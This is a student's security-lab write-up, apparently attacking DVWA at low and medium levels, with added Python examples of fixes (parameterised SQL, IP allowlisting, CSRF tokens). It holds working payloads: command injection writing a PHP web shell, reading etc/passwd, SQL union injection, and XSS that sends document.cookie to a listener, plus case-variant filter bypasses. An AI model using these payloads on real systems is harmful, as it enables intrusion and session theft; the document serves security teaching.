Serikov Ayanbek Assignment 4


Contents
Security level is low
  Command injection
  SQL injection
  SQL Injection (Blind)
  CSRF
  DOM Based Cross Site Scripting (XSS)
  Vulnerability: Reflected Cross Site Scripting (XSS)
  Vulnerability: Stored Cross Site Scripting (XSS)
Security level is medium
  Command injection
  SQL injection
  SQL Injection (Blind)
  CSRF
  DOM Based Cross Site Scripting (XSS)
  Vulnerability: Reflected Cross Site Scripting (XSS)
  Vulnerability: Stored Cross Site Scripting (XSS)

Security level is low.


Command injection
The code checks the OS but does not check that the input is only an IP address. We can run multiple
commands by separating them with ";".

Pinging

; ls
; cat index.php

; whoami; hostname
; ifconfig; ls../

Echo “String”
cat etc/passwd

reverse shell
reverse shell use
Creating php file
127.0.0.1; echo "<?php system(\$_GET['c']); ?>" >hello.php
Opening php file

By url executing commands


SQL injection

Using union
Getting every user
Getting user and database name

Getting version
Getting table name by using union

Getting column by using union


Getting all user and password in one line

Getting hostname
SQL Injection (Blind)
The code does not check or filter the id parameter. The response only says whether the User ID 'exists' or is 'Missing'.
Using Burp Suite
Checking columns
From Burp Suite we know the URL and the cookie, so we can run sqlmap.
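The union-based and blind sections above both come down to one defect: the id parameter is pasted into the SQL text. The following is an added example, not code from the write-up or from the application it tests; it uses a constructed in-memory SQLite table with placeholder hashes, shows the concatenated query beside a parameterised one, and builds the 'exists'/'Missing' response of the blind page on top of the safe lookup so the same payload matches nothing.

```python
import sqlite3
from typing import List, Tuple

# Constructed in-memory table standing in for the application's users table;
# the "hash" values are placeholder strings, not real credentials.
ROWS = [
    (1, "alice", "Anders", "hash-placeholder-1"),
    (2, "bob", "Brandt", "hash-placeholder-2"),
]

# Payload of the kind the write-up uses: closes the quoted id and appends a
# UNION that pulls first names and password hashes from the same table.
UNION_PAYLOAD = "1' UNION SELECT first_name, password FROM users -- "


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Query built by string concatenation: the id is pasted into SQL unchecked."""
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '%s'" % user_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Parameterised query: the value travels separately from the SQL text,
    so the payload is compared as a literal string and matches no row."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?",
        (user_id,)).fetchall()


def user_exists(conn: sqlite3.Connection, user_id: str) -> str:
    """Blind-style response ("exists"/"Missing") built on the safe lookup."""
    return "exists" if lookup_safe(conn, user_id) else "Missing"


def compare(user_id: str) -> Tuple[List[Tuple[str, str]], List[Tuple[str, str]]]:
    """Run the same input through both lookups on a fresh database."""
    conn = make_db()
    return lookup_vulnerable(conn, user_id), lookup_safe(conn, user_id)


if __name__ == "__main__":
    vulnerable_rows, safe_rows = compare(UNION_PAYLOAD)
    print("vulnerable:", vulnerable_rows)   # leaks the hash column
    print("safe:      ", safe_rows)         # []
    db = make_db()
    print("blind:     ", user_exists(db, "1"), user_exists(db, UNION_PAYLOAD))
```

The vulnerable lookup returns the two placeholder hashes alongside the real row; the parameterised lookup returns an empty list for the same input, and the blind-style oracle answers 'Missing' for it. The sqlmap run from the write-up would find nothing to work with against the second form.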
CSRF
It changes the password.

I captured it in Burp Suite.


I can change the password by URL: icanchangepassbyurl.

I checked it by logging in.
DOM Based Cross Site Scripting (XSS)
I changed the URL.
Vulnerability: Reflected Cross Site Scripting (XSS)
Simple script:
<script> window.location='http://127.0.0.1:1777/?cookie=' + document.cookie </script>
This is now stored as a comment. When a user navigates to this page, the script will execute and send the
user's cookie to the attacker.

Set up a listener.

Vulnerability: Stored Cross Site Scripting (XSS)


It does not check or filter
<script>alert(U a hacked)</script>

<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
Security level is medium.

Command injection
It seems a blacklist was added, but there are other metacharacters to try, such as &.
This did not work: 127.0.0.1; ls

But this worked: &ls


127.0.0.1 & echo "<?php system(\$_GET['c']); ?>" >hello.php
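The low-level section says the input is never checked to be an IP address, and the medium-level section shows that a blacklist of separators is defeated by one the author of the filter did not list. The following is an added example, not code from the write-up or from the application it tests: it puts the blacklist pattern beside positive validation with Python's ipaddress module, and builds the ping command as an argument vector so no shell ever parses the target. The blacklist contents (";" and "&&") are an assumption about the pattern described, not the application's actual filter.

```python
from typing import Dict, List
import ipaddress
import subprocess

# Constructed sample inputs: the first two are the payloads used in the
# write-up, the third is the plain target a ping form should accept.
SAMPLE_INPUTS = ["127.0.0.1; ls", "127.0.0.1 & echo test", "127.0.0.1"]


def blacklist_ok(target: str) -> bool:
    """Medium-level style check: reject a few known separators.

    Assumed blacklist (";" and "&&"); it misses the single "&" the
    write-up uses, and any other separator the author did not think of.
    """
    return not any(bad in target for bad in (";", "&&"))


def allowlist_ok(target: str) -> bool:
    """Positive validation: accept only a syntactically valid IP address.

    Anything that is not an address, including every shell metacharacter,
    is rejected without needing a list of bad characters.
    """
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return False
    return True


def build_ping_argv(target: str) -> List[str]:
    """Argument vector for ping after validation; raises on bad input.

    Passing a list to subprocess (no shell=True) means the target is one
    argument to ping, never text that a shell splits on ; or &.
    """
    if not allowlist_ok(target):
        raise ValueError("rejected ping target: %r" % target)
    return ["ping", "-c", "3", target]


def run_ping(target: str) -> str:
    """Run ping for a validated target and return its combined output."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=30)
    return proc.stdout + proc.stderr


def classify(target: str) -> Dict[str, bool]:
    """Show which check each sample input gets past."""
    return {"blacklist": blacklist_ok(target), "allowlist": allowlist_ok(target)}


if __name__ == "__main__":
    for sample in SAMPLE_INPUTS:
        print("%-26r %s" % (sample, classify(sample)))
```

Run stand-alone it prints, for each sample, whether the blacklist and the allowlist accept it: the "&" payload passes the blacklist and fails the allowlist, and only the bare address reaches run_ping. The same shape in PHP is an is-it-an-address check (for example filter_var with FILTER_VALIDATE_IP) followed by escapeshellarg on the single argument.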
SQL injection
It did not work.
As at the low level, I checked whether it can be ordered by 3.

So there is no column 3.
No error, so it can be ordered by column 2.
SQL Injection (Blind)
So I used sqlmap
CSRF
It looks like it has some security: it checks the HTTP Referer header against the server name. If the
server name is present in the Referer, the password will change.
I opened Burp Suite and added a Referer header.
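The medium-level check described above passes whenever the server name appears anywhere in the Referer string, and a request-side header is something the sender controls anyway. The following is an added example, not code from the write-up or from the application it tests: it puts that substring check beside a parsed host comparison and a per-session synchroniser token, with the token as the control that actually decides. The host name app.example and the session ids are constructed.

```python
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlparse

# Constructed host name standing in for the application's server name.
SERVER_NAME = "app.example"


def referer_substring_ok(referer: Optional[str], server_name: str = SERVER_NAME) -> bool:
    """Check of the kind the write-up describes: pass if the server name
    appears anywhere in the Referer string, path included."""
    return referer is not None and server_name in referer


def referer_host_ok(referer: Optional[str], server_name: str = SERVER_NAME) -> bool:
    """Parse the Referer and require the host component itself to match."""
    if not referer:
        return False
    parsed = urlparse(referer)
    return parsed.scheme in ("http", "https") and parsed.hostname == server_name


class CsrfTokens:
    """Per-session synchroniser tokens: issued into the form, verified on submit."""

    def __init__(self) -> None:
        self._by_session: Dict[str, str] = {}

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._by_session[session_id] = token
        return token

    def verify(self, session_id: str, presented: Optional[str]) -> bool:
        expected = self._by_session.get(session_id)
        if expected is None or presented is None:
            return False
        # Constant-time comparison so the check does not leak by timing.
        return hmac.compare_digest(expected, presented)


def password_change_allowed(tokens: CsrfTokens, session_id: str,
                            referer: Optional[str], presented: Optional[str]) -> bool:
    """The token is the primary control; the host check is defence in depth."""
    return tokens.verify(session_id, presented) and referer_host_ok(referer)


if __name__ == "__main__":
    tokens = CsrfTokens()
    tok = tokens.issue("sess-1")
    print(password_change_allowed(tokens, "sess-1", "https://app.example/csrf/", tok))   # True
    print(password_change_allowed(tokens, "sess-1", "https://app.example/csrf/", None))  # False
```

A cross-site form submitted from a victim's browser carries no token for that session, so the change is refused before the Referer is even consulted; the parsed host check then only adds a second, independent reason to refuse.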
DOM Based Cross Site Scripting (XSS)
It has a filter for <script>, but we can use <SCRIPT>, <ScRipt> and so on.
Vulnerability: Reflected Cross Site Scripting (XSS)
Capitalised script worked.
Vulnerability: Stored Cross Site Scripting (XSS)

I changed the max-length value, then used <SCRIPT>alert('sss')</SCRIPT>

<SCRIPT>alert("cookie: "+document.cookie)</ SCRIPT >


<img src=x onerror=alert(document.domain)>

<SCRIPT> document.location.href="https://google.com" </SCRIPT> Sends us to the website we want.
By pressing "Ayan" we can go to a specific website.
